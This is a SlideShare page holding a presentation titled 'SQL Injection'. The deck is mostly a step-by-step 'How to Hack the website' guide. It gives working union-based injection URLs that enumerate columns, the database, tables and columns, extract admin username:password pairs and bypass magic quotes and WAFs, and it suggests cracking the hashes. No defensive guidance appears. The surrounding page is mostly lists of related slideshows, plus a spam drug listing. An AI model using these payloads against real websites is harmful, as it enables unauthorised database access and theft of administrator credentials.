SlideShare ist ein Scribd-Unternehmen logo

SQL Injection

Adhoura Academy
Adhoura Academy

SQL Injection

BildungTechnologie
1 von 17
SQL Injection Kaushal Kishore Sr. Software Engineer OSSCube Pvt. Ltd. Kaushal.rahuljaiswal@gmail.com www.osscube.com
What is SQL Injection  SQL injection is a technique that is applied by giving malicious inputs, that result in allowing the hacker to access over the database of the Host, in case if the database operations of that web sites is allowed directly...!  "SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks".
How to Hack the website Using SQL Injection
SQL Injection
Check Site is vulnerable or Not?  Add the '(Single Quote) sign with the integer value in URL  http://www.examplesite.com/index.php?id=5'  If the site shows you an error it is vulnerable to SQL, lets say we found a vulnerable site.
Find Number of Columns  http://www.examplesite.com/index.php?id=5 order by 1--  And we will keep increasing the number until we get an error.  http://www.examplesite.com/index.php?id=5 order by 5--  http://www.examplesite.com/index.php?id=5 order by 10--  Lets say there is 10 columns in the database.
Find vulnerable columns.  http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--  Notice that I have put a single - in front of the id number (id=-5)  Since there is no page with the id -5 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.  Okay lets say the numbers 3, 6 and 9 popped up on the site, as vulnerable columns.
Find Database Version  http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--  And if that doesn't work then try this 1:  http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--
Find Database Name  http://www.examplesite.com/index.php?id=-5 union select 1,2, concat(database()) ,4,5,6,7,8,9,10--  Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase  If the version is 4 or below, it is probably best that you just move on to another site since you are gonna have to brute force the tables for information (which isn't a very good idea for starters like us )
Find the Tables Name  http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--  http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--  http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name ,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
Find the Columns Name  http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--  If the site shows you an error now don't panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.
Change the Name of Table to Hex  Copy the name of the table you are trying to access, visit the site Text to Hex, paste the name into the website where it says "Say Hello To My Little Friend". Click Convert copy the hex into your query like this.  http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--  Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.  You should now see all the columns inside the table.
Find the Content of the Tables  Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:  http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--  This is where we needed the database name. Btw the 0x3a means colon ( : )  Now you have the admin login!  If it is decrypted, try to run it through some online md5 'decrypters' or use my free cracked  And now we have to find the admin login, to do so, once again you can
By Pass The WAF  http://www.example.com/staffdetail.php?id=123'+/*! union*/select+1,2,3,4,5,6,7--+  http://www.example.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--  http://www.example.com/staffdetail.php?id=123'+/*!union*//*!select*/ +all+1,2,table_name,4,5,6,7+FROM+information_schema.tables+W HERE+table_schema+=+database()+LIMIT+0,10--+
Tools for SQL Injection  SQL Ninja  SQL Map  Havij
Questions
Thank you for your Time and Attention! 17

Empfohlen

A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 

Empfohlen

A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Sql injection
Sql injectionSql injection
Sql injectionSasha-Leigh Garret
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Sqlmap
SqlmapSqlmap
SqlmapRushikesh Kulkarni
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionMarios Siganos
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 

Weitere ähnliche Inhalte

Was ist angesagt?

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Codingbilcorry
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 

Was ist angesagt? (20)

Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
SQL injection
SQL injectionSQL injection
SQL injection
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Web application security
Web application securityWeb application security
Web application security
 

Andere mochten auch

Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Les attaques par injection sql
Les attaques par injection sqlLes attaques par injection sql
Les attaques par injection sqlMohamed Yassin
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]Wixiweb
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSiddhesh Bhobe
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injectionjpubal
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Nuno Loureiro
 

Andere mochten auch (16)

SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Les attaques par injection sql
Les attaques par injection sqlLes attaques par injection sql
Les attaques par injection sql
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]Introduction à la sécurité des applications web avec php [fr]
Introduction à la sécurité des applications web avec php [fr]
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
 
SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1SQL injection: Not only AND 1=1
SQL injection: Not only AND 1=1
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
SQL 2014 et la gestion de la sécurité
SQL 2014 et la gestion de la sécurité SQL 2014 et la gestion de la sécurité
SQL 2014 et la gestion de la sécurité
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy Queries
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
Introduction to SQL Injection
Introduction to SQL InjectionIntroduction to SQL Injection
Introduction to SQL Injection
 
Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks Advanced SQL Injection: Attacks
Advanced SQL Injection: Attacks
 

Ähnlich wie SQL Injection

Website Security
Website SecurityWebsite Security
Website SecurityCarlos Z
 
Website Security
Website SecurityWebsite Security
Website SecurityMODxpo
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Things to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchThings to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchElsner Technologies Pvt Ltd
 
Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )
Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )
Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )Ehtisham Ullah
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
GCSECS-DefensiveDesign.pptx
GCSECS-DefensiveDesign.pptxGCSECS-DefensiveDesign.pptx
GCSECS-DefensiveDesign.pptxazida3
 
Using Rails to Create an Enterprise App: A Real-Life Case Study
Using Rails to Create an Enterprise App: A Real-Life Case StudyUsing Rails to Create an Enterprise App: A Real-Life Case Study
Using Rails to Create an Enterprise App: A Real-Life Case StudyDavid Keener
 

Ähnlich wie SQL Injection (20)

Sq li
Sq liSq li
Sq li
 
Asp
AspAsp
Asp
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Blind sql injection
Blind sql injectionBlind sql injection
Blind sql injection
 
Website Security
Website SecurityWebsite Security
Website Security
 
Website Security
Website SecurityWebsite Security
Website Security
 
secure php
secure phpsecure php
secure php
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
FORENSIC PRESTTN
FORENSIC PRESTTNFORENSIC PRESTTN
FORENSIC PRESTTN
 
Mysql python
Mysql pythonMysql python
Mysql python
 
Mysql python
Mysql pythonMysql python
Mysql python
 
Things to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratchThings to keep in mind while creating a word press plugin from scratch
Things to keep in mind while creating a word press plugin from scratch
 
Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )
Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )
Sql injection ( http://etabz.blogspot.com/2014/11/sql-injection.html )
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Mysql
MysqlMysql
Mysql
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
GCSECS-DefensiveDesign.pptx
GCSECS-DefensiveDesign.pptxGCSECS-DefensiveDesign.pptx
GCSECS-DefensiveDesign.pptx
 
Using Rails to Create an Enterprise App: A Real-Life Case Study
Using Rails to Create an Enterprise App: A Real-Life Case StudyUsing Rails to Create an Enterprise App: A Real-Life Case Study
Using Rails to Create an Enterprise App: A Real-Life Case Study
 

Mehr von Adhoura Academy

Drupal Content Management System
Drupal Content Management SystemDrupal Content Management System
Drupal Content Management SystemAdhoura Academy
 
Content management system
Content management systemContent management system
Content management systemAdhoura Academy
 
Java script final presentation
Java script final presentationJava script final presentation
Java script final presentationAdhoura Academy
 
Open Source Presentation
Open Source PresentationOpen Source Presentation
Open Source PresentationAdhoura Academy
 

Mehr von Adhoura Academy (7)

Docker Presentation
Docker PresentationDocker Presentation
Docker Presentation
 
Google Dorks
Google DorksGoogle Dorks
Google Dorks
 
Drupal Content Management System
Drupal Content Management SystemDrupal Content Management System
Drupal Content Management System
 
Content management system
Content management systemContent management system
Content management system
 
Java script final presentation
Java script final presentationJava script final presentation
Java script final presentation
 
Android Presentation
Android PresentationAndroid Presentation
Android Presentation
 
Open Source Presentation
Open Source PresentationOpen Source Presentation
Open Source Presentation
 

Kürzlich hochgeladen

HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxEsquimalt MFRC
 
Salient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsSalient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsKarakKing
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
Interdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptxInterdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptxPooja Bhuva
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17Celine George
 
The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxheathfieldcps1
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Pooja Bhuva
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...ZurliaSoop
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxmarlenawright1
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfDr Vijay Vishwakarma
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.pptRamjanShidvankar
 
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxOn_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxPooja Bhuva
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Jisc
 
How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17Celine George
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - Englishneillewis46
 

Kürzlich hochgeladen (20)

HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
Salient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functionsSalient Features of India constitution especially power and functions
Salient Features of India constitution especially power and functions
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Interdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptxInterdisciplinary_Insights_Data_Collection_Methods.pptx
Interdisciplinary_Insights_Data_Collection_Methods.pptx
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
The basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptxThe basics of sentences session 3pptx.pptx
The basics of sentences session 3pptx.pptx
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptxHMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
HMCS Vancouver Pre-Deployment Brief - May 2024 (Web Version).pptx
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdfUnit 3 Emotional Intelligence and Spiritual Intelligence.pdf
Unit 3 Emotional Intelligence and Spiritual Intelligence.pdf
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptxOn_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
On_Translating_a_Tamil_Poem_by_A_K_Ramanujan.pptx
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17How to Add New Custom Addons Path in Odoo 17
How to Add New Custom Addons Path in Odoo 17
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and Modifications
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - English
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 

SQL Injection

  • 1. SQL Injection Kaushal Kishore Sr. Software Engineer OSSCube Pvt. Ltd. Kaushal.rahuljaiswal@gmail.com www.osscube.com
